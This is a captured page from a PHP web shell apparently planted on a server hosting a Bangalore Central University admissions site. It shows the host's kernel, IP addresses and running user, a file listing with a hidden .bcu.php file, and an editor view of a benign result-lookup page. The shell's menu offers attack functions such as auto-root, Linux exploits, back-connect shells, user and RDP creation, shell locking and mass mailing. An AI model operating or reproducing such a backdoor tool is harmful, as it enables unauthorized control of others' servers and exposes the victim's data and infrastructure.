Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.222.54.32
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
phdadm /
bcu /
[ HOME SHELL ]
Name
Size
Permission
Action
.bcu.php
3.61
KB
-rw-r--r--
MainPage.html
52.32
KB
-rwxrwxrwx
app-status.html
3.37
KB
-rwxrwxrwx
dat.json
5.03
KB
-rwxrwxrwx
ent-application.html
92.71
KB
-rwxrwxrwx
ent-application05.10.2020.html
83.65
KB
-rwxrwxrwx
forgotPassword.html
5.11
KB
-rwxrwxrwx
genRankPrio.php
894
B
-rwxrwxrwx
index.html
5.24
KB
-rwxrwxrwx
index_adm.html
5.42
KB
-rwxrwxrwx
instruction.html
10.69
KB
-rwxrwxrwx
login.html
6.95
KB
-rwxrwxrwx
make-payment.html
452
B
-rwxrwxrwx
mock-seat-allotment.html
608
B
-rwxrwxrwx
option-entry.html
1.54
KB
-rwxrwxrwx
pg-forgotPassword.html
4.1
KB
-rwxrwxrwx
pg-sign-up.html
7.81
KB
-rwxrwxrwx
pg_instruction.html
8.86
KB
-rwxrwxrwx
pgadm.html
67.76
KB
-rwxrwxrwx
result.html
2.58
KB
-rw-r--r--
seat-allotment.html
1.08
KB
-rwxrwxrwx
seatAllot.php
6.75
KB
-rwxrwxrwx
sign-up.html
7.96
KB
-rwxrwxrwx
support.html
4.76
KB
-rwxrwxrwx
upload_file.php
787
B
-rwxrwxrwx
upload_file_pg.php
746
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : result.html
<script type="text/javascript"> function chkFields(frm) { var illegalChars = /[^A-Za-z\d]/; if(frm.txtRegdno.value == "") { alert("Enter Roll Number"); frm.txtRegdno.focus(); return false; } else if(frm.txtRegdno.value.length < 0) { alert("Invalid Roll Number"); frm.txtRegdno.focus(); return false; } else if(illegalChars.test(frm.txtRegdno.value)) { alert("Invalid Roll Number"); frm.txtRegdno.focus(); return false; } frm.txtRegdno.value = frm.txtRegdno.value.toUpperCase(); window.location.href = "https://easyexam.co.in/result/" + frm.txtRegdno.value + ".pdf"; return false; } </script> <html> <head> <link rel="stylesheet" href="css/bgtio.css"> </head> <body class="bg"> <title>Banglore Central University</title> <div class="header"> <h2 style="text-align:center;"><img src="https://universitysolutions.in/phdadm/img/041_logo.jpg"> </h2> <h4 style="text-align:center; font-family: verdana, sans-serif;">Banglore Central University Result Download</h4> <!-- Form Section --> <div style="text-align:center;" > <form action="" method="post" name="frmResults" id="frmResults" onsubmit="return chkFields(this);"> Examination Enrollment No: <input name="txtRegdno" type="text" class="inputtxt" id="txtRegdno" size="20" maxlength="21" /> <input name="cmdSearch" type="submit" class="mybutton" id="cmdSearch" value="Show" /> </form> </div> <!-- End Form Section --> <!-- Print Section --> <h4 style="text-align:center;"> </h4> </div> <!-- End Print Section --> <table> <tr> <td></td> <td></td> <td style="float:right; font-family: verdana, sans-serif;"></td> <td> <a style="float:right" href="" onClick="window.print()"></a></td> </tr> </table> <!-- End Print Section --> <h3 style="text-align:center;"> </h3 ></div> <p style="font-size:12px;"><strong>Disclaimer:</strong> BCU is not responsible for any inadvertent error that may have crept in the results being published on NET. The results published on net are for immediate information to the examinees. These cannot be treated as original mark sheets. Original mark sheets have been issued by the University separately. </p> <div style="text-align:center;font-family: verdana, sans-serif;font-size: 14px;width: 100%; margin-top:-20px;"> <a href="https://www.bcu.ac.in/"><strong>Click here for BCU Home Page</strong></a></div> </body> </html>
Close